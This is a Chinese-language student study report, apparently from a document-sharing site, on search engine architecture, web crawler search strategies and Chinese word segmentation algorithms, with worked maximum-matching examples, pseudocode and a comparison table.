版權說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權,請進行舉報或認領
文檔簡介
互聯(lián)網(wǎng)搜索的關鍵技術中文摘要搜索引擎是互聯(lián)網(wǎng)搜索的重要技術,基于搜索引擎的網(wǎng)絡爬蟲技術和中文分詞技術又是在搜索引擎技術中不可或缺的兩大技術。其中中文分詞技術是計算機中文信息處理中的難題,而中文分詞算法是其中的核心,但由于中英文環(huán)境中語素的不同特點,使得中文必須解決分詞的問題。本次學習研究的目的是了解搜索引擎技術和基于搜索引擎的網(wǎng)絡爬蟲技術和中文分詞技術,并將中文分詞的相關算法進行研究對比,方便日后選取最佳的技術進行搜索。本次學習研究采用了網(wǎng)上查閱電子資料以及閱讀書籍資料,通過學習,研究,討論,整理和對比等方法。本學習研究建構和論證了各種技術的工作流程和搜索策略,并對各種策略做了詳細的案例分析,并且做了相應的對比。各種技術都有自己的優(yōu)缺點,在了解之后,采用最佳的搜索技術才是關鍵。關鍵詞:技術搜索引擎網(wǎng)絡爬蟲中文分詞
目錄引言 3一.搜索引擎技術 41.什么是搜索引擎 42.搜索引擎原理 4二.基于搜索引擎的網(wǎng)絡爬蟲技術 51.什么是網(wǎng)絡爬蟲技術 52.網(wǎng)絡爬蟲原理 63.網(wǎng)絡爬蟲搜索策略 8(1)寬度優(yōu)先搜索策略 8(2)深度優(yōu)先搜索策略 9(3)聚焦搜索策略 104.網(wǎng)絡爬蟲的具體實現(xiàn) 11三.基于搜索引擎中文分詞技術 121.什么是中文分詞 122.中文分詞的過程 133.中文分詞算法的分類 14(1)基于字符串匹配的分詞方法 14(2)基于理解的分詞方法 18(3)基于統(tǒng)計的分詞方法 184.各種分詞方法的優(yōu)劣對比 19(1)歧義識別 19(2)新詞識別 20(3)需要詞典 20(4)需要語料庫 20(5)需要規(guī)則庫 20(6)算法復雜性 21(7)技術成熟度 21(8)實施復雜性 21(9)分詞準確性 21(10)分詞速度 21結論 22參考文獻 23
引言隨著Internet的飛速發(fā)展和網(wǎng)上信息的迅速增加,各種各樣的搜索引擎不斷涌現(xiàn)。搜索引擎對網(wǎng)頁進行索引時需要進行索引項的提取,那么搜索引擎是通過什么對成千上萬的網(wǎng)頁進行提取呢?由于中文詞匯之間沒有天然的分隔符,所以必須采用分詞技術進行中文文本的索引項提取。但是分詞技術的具體算法有哪些?不同算法間又有何聯(lián)系和區(qū)別呢?本文就對基于搜索引擎的網(wǎng)絡爬蟲與基于搜索引擎的中文分詞的各種算法進行了比較與分析。
一.搜索引擎技術1.什么是搜索引擎搜索引擎是因特網(wǎng)上一種基于WEB的信息檢索工具,用來檢索網(wǎng)站、網(wǎng)頁、新聞組、圖片、聲音等Web文件。這類網(wǎng)站與一般網(wǎng)站不同的是,其主要功能是采用人工或自動的方式去搜尋WEB上的信息,并將網(wǎng)絡信息進行主題分類、建立索引,再把索引的內(nèi)容存放到索引數(shù)據(jù)庫中,通過查詢語法為用戶返回匹配資源,以幫助用戶在Internet中搜尋所需要的信息。面對浩瀚的網(wǎng)絡資源,搜索引擎為所有網(wǎng)上沖浪的用戶提供了一個入口.2.搜索引擎原理現(xiàn)在學術界和工業(yè)界,一致認為搜索引擎分為下載、分析、索引和查詢4個系統(tǒng),這4個系統(tǒng)相互配合,共同實現(xiàn)了搜索引擎的需求。在圖1中:下載系統(tǒng)負責從萬維網(wǎng)上下載各種類型的網(wǎng)頁,并保持與萬維網(wǎng)的同步。分析系統(tǒng)負責分析下載系統(tǒng)得到的網(wǎng)頁數(shù)據(jù),進行信息抽取、網(wǎng)頁去重、中文分詞和PageRank等。索引系統(tǒng)負責將分析系統(tǒng)處理后的網(wǎng)頁對象索引入庫,作為搜索引擎的數(shù)據(jù)大本營,需要存儲數(shù)以億計的網(wǎng)頁,并需要支持多用戶的同時檢索,提供低于秒級的檢索時間。查詢系統(tǒng)負責分析用戶提交的查詢請求,經(jīng)過檢索、排序、提取摘要等相關操作,從索引庫中檢索出網(wǎng)頁并將網(wǎng)頁排序后,以查詢結果的形式返回給用戶.索引庫索引庫提交查詢返回查詢結果分析系統(tǒng)下載系統(tǒng)用戶網(wǎng)頁庫查詢系統(tǒng)索引系統(tǒng)互聯(lián)網(wǎng)圖1搜索引擎簡單結構圖
二.基于搜索引擎的網(wǎng)絡爬蟲技術1.什么是網(wǎng)絡爬蟲技術通過搜索引擎,用戶可以穿梭于放置在不同地點、隸屬于不同網(wǎng)絡的WWW網(wǎng)頁,獲取所需要的各種信息,其商業(yè)運行十分成功且都有自己的核心技術。而在整個搜索引擎系統(tǒng)中,網(wǎng)絡爬蟲起著重要的作用,它是搜索引擎最核心的技術,是Internet搜索引擎的數(shù)據(jù)來源,它決定著整個系統(tǒng)的內(nèi)容是否豐富、信息是否能夠得到及時更新.網(wǎng)絡爬蟲的定義有廣義和狹義之分。狹義上指遵循標準的http協(xié)議利用超鏈接和Web文檔檢索的方法遍歷萬維網(wǎng)信息空間的軟件程序;而廣義的定義則是所有能遵循h(huán)ttp協(xié)議檢索Web文檔的軟件都稱之為網(wǎng)絡爬蟲。[0]網(wǎng)絡爬蟲是一個功能很強的自動提取網(wǎng)頁的程序,它為搜索引擎從萬維網(wǎng)上下載網(wǎng)頁,是搜索引擎的重要組成.它通過請求站點上的HTML文檔訪問某一站點。它遍歷Web空間,不斷從一個站點移動到另一個站點,自動建立索引,并加入到網(wǎng)頁數(shù)據(jù)庫中。網(wǎng)絡爬蟲進入某個超級文本時,它利用HTML語言的標記結構來搜索信息及獲取指向其他超級文本的URL地址,可以完全不依賴用戶干預實現(xiàn)網(wǎng)絡上的自動爬行和搜索。InternetInternet網(wǎng)頁網(wǎng)絡爬蟲網(wǎng)頁分析器創(chuàng)建倒排索引切調(diào)器數(shù)據(jù)庫建立數(shù)據(jù)庫查詢網(wǎng)頁編碼文件倒排表和與倒排表配套使用的輔助文件檢索器查詢邏輯并交差等運算用戶界面用戶結果返回結果圖2搜索引擎系統(tǒng)的結構
2.網(wǎng)絡爬蟲原理隨著互聯(lián)網(wǎng)規(guī)模的飛速增長,高效、準確地獲得包含用戶所需信息的網(wǎng)頁,日益成為迫切需要解決的問題,搜索引擎是解決這一問題的有效方法[1,2]。搜索引擎中最關鍵的一部分是網(wǎng)頁搜索器,它由一個爬蟲(Crawler,又稱網(wǎng)頁抓取器、網(wǎng)絡機器人、網(wǎng)絡蜘蛛)程序組成。所謂爬蟲程序是指會自動地、永不停止地在網(wǎng)絡上搜索網(wǎng)頁的程序,現(xiàn)在基于關鍵字查詢的搜索引擎已經(jīng)不能滿足用戶對搜索的結果更準、搜索的范圍更廣的要求。因此新一代的搜索引擎——智能搜索引擎呼之欲出。所謂智能搜索引擎就是一種分類細致精確、數(shù)據(jù)全面深入、更新及時的面向主題的具有智能化的搜索引擎。這類新一代的搜索引擎要求爬蟲等程序能夠更快更新網(wǎng)頁,更廣地搜索網(wǎng)頁。所以做好這類搜索引擎的網(wǎng)絡爬蟲將是搜索引擎能否向前發(fā)展的關鍵.根據(jù)抓取過程爬蟲程序主要分為三個功能模塊:一個是網(wǎng)頁讀取模塊主要是用來讀取遠程Web服務器上的網(wǎng)頁內(nèi)容;另一個是超鏈分析模塊,這個模塊主要是分析網(wǎng)頁中的超鏈接,將網(wǎng)頁上的所有超鏈接提取出來,放入到待抓取URL列表中;再一個模塊就是內(nèi)容分析模塊,這個模塊主要是對網(wǎng)頁內(nèi)容進行分析,將網(wǎng)頁中所有HTML標簽去掉只留下網(wǎng)頁文字內(nèi)容。爬蟲程序的主要工作流程如圖3所示,首先爬蟲程序讀取抓取站點的URL列表,取出一個站點URL,將其放入未訪問的URL列表(UVURL列表)中,如果UVURL不為空則從中取出一個URL判斷是否已經(jīng)訪問過,若沒有訪問過則讀取此網(wǎng)頁,并進行超鏈分析及內(nèi)容分析,然后將此網(wǎng)頁存入文檔數(shù)據(jù)庫,將URL放入已訪問URL列表(VURL列表),直到UVRL為空為止,此時再抓取其它站點,依次循環(huán)直到所有的站點URL列表都被抓取完為止.是是是是將URL放入UVURL列表取出URL超級鏈接分析內(nèi)容分析讀取此URL網(wǎng)頁存入文檔庫URL列表為空?UVURL為空?是否已訪問結束刪除此URL并加入VURL讀取站點URL列表說明:UVURL:當前站點未訪問的URLVURL當前站點已訪問的URL創(chuàng)建爬蟲圖3爬蟲程序工作流程
3.網(wǎng)絡爬蟲搜索策略互聯(lián)網(wǎng)上的信息太多,即使功能強大的爬蟲程序也不可能搜集互聯(lián)網(wǎng)上的全部信息。因此,爬蟲程序采用一定的搜索策略對互聯(lián)網(wǎng)進行遍歷并下載文檔。(1)寬度優(yōu)先搜索策略寬度優(yōu)先搜索策略(又稱廣度優(yōu)先搜索)是最簡便的圖的搜索算法之一,這一算法也是很多重要的圖的算法的原型。Dijkstra單源最短路徑算法和Prim最小生成樹算法都采用了和寬度優(yōu)先搜索類似的思想。寬度優(yōu)先搜索算法是沿著樹的寬度遍歷樹的節(jié)點,如果發(fā)現(xiàn)目標,則算法中止。該算法的設計和實現(xiàn)相對簡單,屬于盲目搜索。在目前為覆蓋盡可能多的網(wǎng)頁,一般使用寬度優(yōu)先搜索方法。也有很多研究者將寬度優(yōu)先搜索策略應用于聚焦爬蟲中。其基本思想是認為與初始URL在一定鏈接距離內(nèi)的網(wǎng)頁具有主題相關性的概率很大。另外一種方法是將寬度優(yōu)先搜索與網(wǎng)頁過濾技術結合使用,先用廣度優(yōu)先策略抓取網(wǎng)頁,再將其中無關的網(wǎng)頁過濾掉。這些方法的缺點在于,隨著抓取網(wǎng)頁的增多,大量的無關網(wǎng)頁將被下載并過濾,算法的效率將變低.[4]GGBFACEDHI廣度優(yōu)先的抓取順序:A—B.C.D.E.F—H.G--I圖4廣度優(yōu)先的抓取
(2)深度優(yōu)先搜索策略深度優(yōu)先搜索所遵循的搜索策略是盡可能“深”地搜索。在深度優(yōu)先搜索中,對于最新發(fā)現(xiàn)的頂點,如果它還有以此為起點而未探測到的邊,就沿此邊繼續(xù)探測下去。當結點v的所有邊都己被探尋過,搜索將回溯到發(fā)現(xiàn)結點v有那條邊的起始結點。這一過程一直進行到已發(fā)現(xiàn)從源結點可達的所有結點為止。如果還存在未被發(fā)現(xiàn)的結點,則選擇其中一個作為源結點并重復以上過程,整個進程反復進行直到所有結點都被發(fā)現(xiàn)為止。深度優(yōu)先在很多情況下會導致爬蟲的陷入(trapped)問題,所以它既不是完備的,也不是最優(yōu)的。基于第一代網(wǎng)絡爬蟲的搜索引擎抓取的網(wǎng)頁一般少于1,000,000個網(wǎng)頁,極少重新搜集網(wǎng)頁并去刷新索引,而且其檢索速度非常慢,一般都要等待10s甚至更長的時間。GBGBFACEDIH深度優(yōu)先的抓取順序:A—F—GEHI圖5深度優(yōu)先的抓取
(3)聚焦搜索策略爬蟲是搜索引擎的核心部件,搜索引擎利用它從Web中采集網(wǎng)頁,完成重要的第一步工作。傳統(tǒng)搜索引擎的頁面采集面向整個Web,普通爬蟲能夠順利完成工作,但Web信息急劇膨脹使搜索引擎專用化成為發(fā)展趨勢,定向采集信息成為搜索引擎一個重要研究方向,聚焦爬蟲(FocusedCrawler)也應運而生。聚焦爬蟲的設計是以普通爬蟲為基礎的,實際上它是對一個普通爬蟲程序進行功能上的擴充。在對網(wǎng)頁的整個處理過程中需要增加模塊:主題確立模塊、優(yōu)化初始種子模塊、主題相關度分析模塊、排序模塊,如圖6所示。主題確立模塊用于確立爬蟲面向的主題;主題相關度分析模塊用來進行網(wǎng)頁主題相關度的計算;初始種子模塊用于生成面向特定主題的較好的種子站點,使爬行模塊能夠順利展開爬行工作;主題相關度分析模塊是聚焦爬蟲的核心模塊,它決定頁面的取舍;排序模塊是對頁面的最終處理,給與主題相關頁面的價值一個較為全面的評價排序。其中,初始種子模塊和主題確立模塊是兩個輔助模塊,不參與數(shù)據(jù)流的處理.爬蟲程序爬蟲程序相關度分析模塊主題確立模塊HTML文檔初始種子模塊數(shù)據(jù)庫排序模塊圖6聚焦爬蟲程序架構系統(tǒng)工作流程如下:1.爬蟲程序取回網(wǎng)頁;2.調(diào)用相關度分析模塊,對網(wǎng)頁進行相關度分析;3.爬蟲根據(jù)分析的不同結果進行相應的處理;4.爬蟲從數(shù)據(jù)庫中取出等待處理的URL繼續(xù)工作,返回到第一步,直至沒有新的URL;5.對網(wǎng)頁的重要程度進行排序。[4]聚焦爬蟲是一個自動下載網(wǎng)頁的程序,它根據(jù)既定的抓取目標有選擇的訪問萬維網(wǎng)上的網(wǎng)頁與相關的鏈接,獲取所需要的信息。與通用爬蟲不同,聚焦爬蟲并不追求大的覆蓋,而將目標定為抓取與某一特定主題內(nèi)容相關的網(wǎng)頁,為面向主題的用戶查詢準備數(shù)據(jù)資源。圖6傳統(tǒng)的圖算法圖7聚焦搜索策略現(xiàn)有的聚焦爬蟲對抓取目標的描述或定義可以分為基于目標網(wǎng)頁特征、基于目標數(shù)據(jù)模式和基于領域概念三種。基于目標網(wǎng)頁特征的爬蟲所抓取、存儲并索引的對象一般為網(wǎng)站或網(wǎng)頁。具體的方法根據(jù)種子樣本的獲取方式可以分為:預先給定的初始抓取種子樣本;預先給定的網(wǎng)頁分類目錄和與分類目錄對應的種子樣本,如Yahoo!分類結構等;通過用戶行為確定的抓取目標樣例。其中,網(wǎng)頁特征可以是網(wǎng)頁的內(nèi)容特征,也可以是網(wǎng)頁的鏈接結構特征,等等。基于目標數(shù)據(jù)模式的爬蟲針對的是網(wǎng)頁上的數(shù)據(jù),所抓取的數(shù)據(jù)一般要符合一定的模式,或者可以轉(zhuǎn)化或映射為目標數(shù)據(jù)模式。另一種描述方式是建立目標領域的本體或詞典,用于從語義角度分析不同特征在某一主題中的重要程度。[5]4.網(wǎng)絡爬蟲的具體實現(xiàn)Google的搜索引擎是一個分布式系統(tǒng),它使用多臺機器進行爬蟲,網(wǎng)絡爬蟲包括五個基本部分,分別屬于不同模塊中。URLServer模塊負責從文件系統(tǒng)中讀取URLs將其分配給各個爬蟲模塊,每一個爬蟲模塊運行于不同的機器上,是一個單線程,通過異步I/O傳輸方式從多達300臺服務器上同時抓取網(wǎng)頁。爬蟲把下載下來的網(wǎng)頁交給一個單一的StoreServer模塊:模塊負責將下載的網(wǎng)頁壓縮,并存于磁盤上。該網(wǎng)頁然后被Indexer模塊讀出,通過該模塊,從網(wǎng)頁中提取出超鏈接并將它們存于不同的磁盤文件上。然后URL-solver模塊讀取超鏈接文件,將相對URL轉(zhuǎn)化為絕對URL,并將該絕對URL存于磁盤文件上以供URLServer模塊讀取??偟膩碚f,爬蟲模塊需要3-4臺機器,因此整個系統(tǒng)可能會需要4-8臺機器。三.基于搜索引擎中文分詞技術1.什么是中文分詞眾所周知,英文是以詞為單位的,詞和詞之間是靠空格隔開,而中文是以字為單位,句子中所有的字連起來才能描述一個意思。例如,英文句子Iamastudent,用中文則為:“我是一個學生”。計算機可以很簡單通過空格知道student是一個單詞,但是不能很容易明白“學”、“生”兩個字合起來才表示一個詞。把中文的漢字序列切分成有意義的詞,就是中文分詞,有些人也稱為切詞。2.中文分詞的過程將中文文檔進行句子切分,作為中文分詞的初始輸入。將中文文檔進行句子切分,作為中文分詞的初始輸入。對輸入的中文短句進行原子切分,建立初始切分詞圖基于原子系列,從不同視角分別進行中文詞語識別,并將各自的切分結果添加到切分詞圖中。根據(jù)切分詞圖,生成一條最優(yōu)的分詞路徑,作為最終分詞結果并輸出打散過程(堆)砌過程選優(yōu)過程開始結束圖8中文分詞的一般步驟
3.中文分詞算法的分類目前的分詞算法主要分為三大類:基于字符串匹配的分詞方法、基于理解的分詞方法和基于統(tǒng)計的分詞方法.(1)基于字符串匹配的分詞方法這種方法又叫做機械分詞方法,它是按照一定的策略將待分析的漢字串與一個“充分大的”機器詞典中的詞條進行配,若在詞典中找到某個字符串,則匹配成功(識別出一個詞)。按照掃描方向的不同,串匹配分詞方法可以分為正向匹配和逆向匹配;按照不同長度優(yōu)先匹配的情況,可以分為最大(最長)匹配和最小(最短)匹配;按照是否與詞性標注過程相結合,又可以分為單純分詞方法和分詞與標注相結合的一體化方法。常用的幾種機械分詞方法如下:正向最大匹配法(ForwardMaximumMatchingmethod,F(xiàn)MM法)(由左到右的方向)選取包含6—8個漢字的符號串作為最大符號串.把最大符號串與詞典中的單詞條目相距配.如果不能匹配就削掉一個漢字繼續(xù)匹配,直到在詞典中找到相應的單詞為止。匹配的方向是從左到右。例1.如圖9:S2=S2+W+”J”S2=S2+W+”J”S1=S1-W輸出結果S2待切分字段S1;輸出詞串S2=“”最大詞長MaxLen初始化S1是否為空從S1左邊開始,取出候選字串W,W的長度不能大于MaxLen.查詞典,看W是否在詞典中。將W最右邊一個字去掉W是否為單字YYYNNN圖9正向最大匹配法
1)S2=“”;S1不為空。從S1左邊取出候選子串W=“計算語言學”;2)查詞表,“計算語言學”在詞表中,將w加入到S2中,S2=“計算語言學,”,并將W從S1中去掉.此時S1=“課程是三個課時”;3)S1不為空,于是從S1左邊取出候選子串W=“課程是三個”;4)查詞表.W不在詞表中.將W最右邊一個字去掉,得到W=“課程是三”;5)查詞表,W不在詞表中,將W最右邊一個字去掉.得到W=“課程是”;6)查詞表,W不在詞表中.將W最右邊一個字去掉,得到W=“課程”;7)查詞表,W在詞表中,將w加入到s2中.S2=“計算語言學/課程/”,將W從S1中去掉,此時SI=“是三個課時”;8)S1不為空.于是從S1左邊取出候選子串W=“是三個課時”;9)查詞表,W不在詞表中,將W最右邊一個字去掉,得到W=“是三個課”:10)查詞表.W不在詞表中。將W最右邊一個字去掉。得到W=“是三個”:11)查詞表。W不在詞表中。將W最右邊一個字去掉,得到W=“是三”:12)查詞表,W不在謝表c和,將W最右邊一個字去掉,得到W=“是”.這時W是單字,將W加入到S2中,S2=“計算語言學/課程/是/”,并將從S1中去掉,此時S1=“三個課時”;13)S1不為空,從S1左邊取出候選子串W=“三個課時”:14)查詞表,W不在詞表中.將W最右邊一個字去掉,得到W=“三個課”;15)查詞表,W不在詞表中.將W最右邊一個字去掉,得到W=“三個”:16)查詞表.W不存詞表中.將W最右邊一個字去掉,得到W=“三”.這時w是單字,將W加人到S2,中,S2=“計算語言學/課程/是/三/”,并將W從S1中去掉,此時S1=“個課時”。[6]例2:我想找個女朋友.(假設詞典中詞組的最大長度為4,黑色表示已找到的詞,黑色粗斜體表示正在處理的漢字串,灰色表示未處理的漢字串。0.0.我想找個女朋友。
1.我想找個女朋友。(從字符串起始點分出4個字)
2.我想找個女朋友。
3.我想找個女朋友。(在詞典中找到一個詞,我想)
4.我想找個女朋友。
5.我想找個女朋友。
6.我想找個女朋友。
7.我想找個女朋友。(單字也是詞,找)
8.我想找個女朋友。
9.我想找個女朋友。
11.我想找個女朋友。
12.我想找個女朋友。(個)
14.我想找個女朋友。(女朋友)
15.我想找個女朋友偽代碼如下:[7]stringCutWord(S1)Preprocess(S1)
//跳過非漢字部分字符串
While(S1!=“”)
//如果輸入不為空W=S1.substr(0,MaxLen)//取等于最大詞長的候選詞
While(length(W)>1)If(FindInRBTree(W)=false)//如果不是詞并且不是單字
thenW=W–1
//將W中最右邊一個字去掉
S2=W+“/”
//將找到的詞用分隔符隔開
S1=S1–W
//去掉找到的詞,繼續(xù)分析returnS2逆向最大匹配法(BackwardMaximumMatchingmethod,BMM法)(由右到左的方向);逆向匹配方向與FMM法相.是從右向右。實驗表明:對于漢語來說.逆向最大匹配法比正向最大匹配法更有效。逆向最大匹配法的分詞原理和過程與正向最大匹配相似,區(qū)別在于前者從文章或者橘子(字串)的末尾開始切分,若不成功則減去最前面的一個字。比如對于字符串“處理機器發(fā)生的故障”,第一步,從字串的右邊取長度以步長為單位的字段“發(fā)生的故障”在詞典中進行匹配,匹配不成功,再取字段“生的故障”進行匹配,依次匹配,直到分出“故障”一詞,最終使用BMM方法切分的結果為:故障、發(fā)生、機器,處理。該方法要求配備逆序詞典。雙向匹配法(Bi—directionMatchingmethod,BM法)比較FMM法與BMM法的切分結果.從而決定正確的切分,雙向匹配法屬于最大匹配算法的一種增強算法,是將正向最大匹配方法和逆向最大匹配方法結合起來。由于漢語單字成詞的特點,正向最小匹配和逆向最小匹配一般很少使用。一般說來,逆向匹配的切分精度略高于正向匹配,遇到的歧義現(xiàn)象也較少。統(tǒng)計結果表明,單純使用正向最大匹配的錯誤率為1/169,單純使用逆向最大匹配的錯誤率為1/245.但這種精度還遠遠不能滿足實際的需要。實際使用的分詞系統(tǒng),都是把機械分詞作為一種初分手段,還需通過利用各種其它的語言信息來進一步提高切分的準確率。這種算法有它的優(yōu)點:可以兼顧漢語句法規(guī)律的多樣性(即可正向優(yōu)先為主,逆向優(yōu)先仍然存在的情況),但是需要一種評估機制來評估兩種方向的優(yōu)劣。
(2)基于理解的分詞方法這種分詞方法是通過讓計算機模擬人對句子的理解,達到識別詞的效果。其基本思想就是在分詞的同時進行句法、語義分析,利用句法信息和語義信息來處理歧義現(xiàn)象。它通常包括三個部分:分詞子系統(tǒng)、句法語義子系統(tǒng)、總控部分。在總控部分的協(xié)調(diào)下,分詞子系統(tǒng)可以獲得有關詞、句子等的句法和語義信息來對分詞歧義進行判斷,即它模擬了人對句子的理解過程。這種分詞方法需要使用大量的語言知識和信息。由于漢語語言知識的籠統(tǒng)、復雜性,難以將各種語言信息組織成機器可直接讀取的形式,因此目前基于理解的分詞系統(tǒng)還處在試驗階段。例如以下句法分析:HEDHEDSBJ我吃了一頓豐的晚.<EOS>豐盛ATT:定中關系DE:“的”字結構HED:核心SBJ:主語MT:語態(tài)結構OBJ:賓語QUN:數(shù)量關系OBJDEDEATTMTQUN晚餐圖10基于理解的分詞方法(3)基于統(tǒng)計的分詞方法從形式上看,詞是穩(wěn)定的字的組合,因此在上下文中,相鄰的字同時出現(xiàn)的次數(shù)越多,就越有可能構成一個詞。因此字與字相鄰共現(xiàn)的頻率或概率能夠較好的反映成詞的可信度??梢詫φZ料中相鄰共現(xiàn)的各個字的組合的頻度進行統(tǒng)計,計算它們的互現(xiàn)信息。定義兩個字的互現(xiàn)信息,計算兩個漢字X、Y的相鄰共現(xiàn)概率。互現(xiàn)信息體現(xiàn)了漢字之間結合關系的緊密程度。當緊密程度高于某一個閾值時,便可認為此字組可能構成了一個詞。這種方法只需對語料中的字組頻度進行統(tǒng)計,不需要切分詞典,因而又叫做無詞典分詞法或統(tǒng)計取詞方法。但這種方法也有一定的局限性,會經(jīng)常抽出一些共現(xiàn)頻度高、但并不是詞的常用字組,例如“這一”、“之一”、“有的”、“我的”、“許多的”等,并且對常用詞的識別精度差,時空開銷大。實際應用的統(tǒng)計分詞系統(tǒng)都要使用一部基本的分詞詞典(常用詞詞典)進行串匹配分詞,同時使用統(tǒng)計方法識別一些新的詞,即將串頻統(tǒng)計和串匹配結合起來,既發(fā)揮匹配分詞切分速度快、效率高的特點,又利用了無詞典分詞結合上下文識別生詞、自動消除歧義的優(yōu)點。4.各種分詞方法的優(yōu)劣對比由于各種算法都有優(yōu)缺點,因此特意對歧義識別、新詞識別、需要詞典、需要語料庫、需要規(guī)則庫、算法復雜性、技術成熟度、實施難度、分詞準確性、分詞速度這十方面進行了對比。表1分詞方法基于字符串匹配分詞基于理解的分詞基于統(tǒng)計的分詞歧義識別差強強新詞識別差強強需要詞典需要不需要不需要需要語料庫否否是需要規(guī)則庫否是否算法復雜性容易很難一般技術成熟度成熟不成熟成熟實施難度容易很難一般分詞準確性一般準確較準分詞速度快慢一般下面對表1做具體的分析(1)歧義識別歧義識別指一個字符串有多種分詞方法,計算機難以給出到底哪一種分詞算法才是正確的分詞系列。如"表面的"可以分為"表面/的"或"表/面的"。計算機無法判斷哪一種才是準確的分詞系列?;谧址姆衷~算法:僅僅是跟一個電子詞典進行比較,故不能進行歧義識別;基于理解的分詞算法:指通過理解字符串的含義,故有很強的歧義識別能力;基于統(tǒng)計的分詞算法:根據(jù)字符連續(xù)出現(xiàn)次數(shù)的多少,得到分詞系列,故常常能夠給出正確的分詞系列選擇,但是也有可能判斷錯誤的情況。
(2)新詞識別新詞識別也稱作未登錄詞識別,指正確識別詞典中沒有出現(xiàn)的詞語。姓名、機構名、地址、稱謂等千變?nèi)f化,詞典中常常不能完全收錄這些詞語;另外,網(wǎng)絡中出現(xiàn)的流行用語也是一種未登錄詞的常見來源,如"打醬油"為最近出現(xiàn)在網(wǎng)絡中,并迅速流行,從而成為一個新詞。大量的研究證明新詞識別是中文分詞準確性的一個重要影響因素?;谧址姆衷~算法:無法正確識別未登錄詞,因為這種算法僅僅與詞典中存在的詞語進行比較;基于理解的分詞算法:理解字符串的含義,從而有很強的新詞識別能力;基于統(tǒng)計的分詞算法:這種算法對第二種未登錄詞有很強的識別能力,因為出現(xiàn)次數(shù)多,才會當作一個新詞;對于第二類未登錄詞,這類詞語有一定的規(guī)律,如姓名:"姓"+名字,如李勝利;機構:前綴+稱謂,如希望集團;故需要結合一定的規(guī)則進行識別,僅僅統(tǒng)計方法難以正確識別。(3)需要詞典基于字符串的分詞算法:基本思路就是與電子詞典進行比較,故電子詞典是必須的。并且詞典越大,分詞的正確率越高,因為詞典越大,未登錄詞越少,從而可以大大減少未登錄詞識別的錯誤;基于理解的分詞算法:理解字符串的含義,故不需要一個電子詞典;基于統(tǒng)計的分詞算法:僅僅根據(jù)統(tǒng)計得到最終的結果,故電子詞典不是必須的。(4)需要語料庫基于字符串的分詞算法:分詞過程僅僅與一個已經(jīng)存在的電子詞典進行比較,故不需要語料庫;基于理解的分詞算法:理解字符串的含義,故不需要電子詞典;基于統(tǒng)計的分詞算法:需要語料庫進行統(tǒng)計訓練,故語料庫是必須的;且好的語料庫是分詞準確性的保證。(5)需要規(guī)則庫基于字符串的分詞算法:分詞過程僅僅與一個已經(jīng)存在的電子詞典進行比較,不需要規(guī)則庫來進行分詞;基于理解的分詞算法:規(guī)則是計算機進行理解的基礎,故準確、完備的規(guī)則庫是這種分詞算法的前提;基于統(tǒng)計的分詞算法:根據(jù)語料庫統(tǒng)計訓練,故規(guī)則庫不是必須的。
(6)算法復雜性基于字符串的分詞算法:僅僅進行字符串的比較操作,故算法簡單;基于理解的分詞算法:需要充分處理各種規(guī)則,故算法非常復雜;事實上到目前為止,還沒有成熟的這類算法;基于統(tǒng)計的分詞算法:需要語料庫進行訓練,雖然算法也比較復雜,但是已經(jīng)比較常見,故這種分詞的復雜性比第一種大,比第二種容易?,F(xiàn)在的實用分詞系統(tǒng)都采用這種算法。(7)技術成熟度基于字符串的分詞算法:是最早出現(xiàn)也是最成熟的算法;基于理解的分詞算法:是最不成熟的一類算法,到目前為止還沒有成熟的算法;基于統(tǒng)計的分詞算法:已經(jīng)有多種成熟的這類算法,基本上能夠滿足實際的應用。故技術成熟度:基于匹配的分詞算法〉基于理解的分詞算法〉基于統(tǒng)計的分詞算法。(8)實施復雜性同上面的道理,實施復雜性:基于理解的分詞算法〉基于統(tǒng)計的分詞算法〉基于匹配的分詞算法。(9)分詞準確性到目前為止還沒有一個準確的結論,不過從理論上說,基于理解的分詞算法有最高的分詞準確性,理論上有100%的準確性;而基于匹配的分詞算法和基于統(tǒng)計的分詞算法是一種"淺理解"的分詞方法,不涉及真正的含義理解,故可能會出現(xiàn)錯誤,難以達到100%的準確性。(10)分詞速度基于匹配的分詞算法:算法簡單,操作容易,故分詞速度快,所以這種算法常常作為另外兩種算法的預處理,進行字符串的粗分;基于理解的分詞算法:這種算法常常需要操作一個巨大的規(guī)則庫,故速度最慢;基于統(tǒng)計的分詞算法:這種分詞算法僅僅是與一個統(tǒng)計結果進行比較,故速度一般。故一般的分詞速度從快到慢依次為:基于匹配的分詞算法〉基于統(tǒng)計的分詞算法〉基于理解的分詞算法。
結論中文搜索引擎的實現(xiàn)是一項復雜的工作,我們還有很多知識要學習,也還有很多工作要做,目前還只是用于中文文本的搜索.正在做查詢擴展處理的工作,以后還要設計到跨語種的檢索.通過本次的學習研究,我們對不同搜索技術有了更明確,更可靠,更科學的認識。以上分析了各種中文分詞算法的優(yōu)缺點,就目前而言,分詞算法已經(jīng)算是比較成熟了,有簡單的也有復雜的,比如正向最大匹配,逆向最大匹配,雙向最大匹配等等.這里就不一一展開說了。但是要記住的一點是:判斷一個分詞方法好不好,關鍵看兩點,一個是消除歧義的能力;一個是詞典未登陸詞的識別比如人名、地名、機構名等,比如著名的LCTCLAS分詞系統(tǒng)就是采用最大匹配算法。網(wǎng)絡搜索技術是一項應用廣泛的技術,很有繼續(xù)研究的價值,并且有很大的發(fā)展空間。相信通過日后進一步的研究,它一定會更方便的服務于人類的生活。
參考文獻[1]梁斌.走進搜索引擎[M].北京:電子工業(yè)出版社,2007,41-42
[2]鄧順國.試論搜索引擎的發(fā)展趨勢[J].圖書館理論與實踐,2003,5:51-52.[3]周立柱,林玲.聚焦爬蟲技術研究綜述[J].計算機應用,2005,25(9):1965-1969):[4]高嶺.DeepWeb分類搜索引擎關鍵技術研究[D].蘇州:蘇州大學,2007:[5]謝國強,蘭立新,科教文匯[J]2008.04,198;[6]張磊,張代遠.中文分詞算法解析[D].江蘇:南京郵電大學計算機學院,2009;[7]李曉明
閆宏飛
王繼民
,搜索引擎–原理,技術與系統(tǒng)[M].北京:科學出版社,2007,55;[8]CSDN.NET.[9]徐寶文,張衛(wèi)豐,搜索引擎與信息獲取技術[M].北京:清華大學出版社,2003[10]陸建江等,智能檢索技術[M].北京:科學出版社,2009
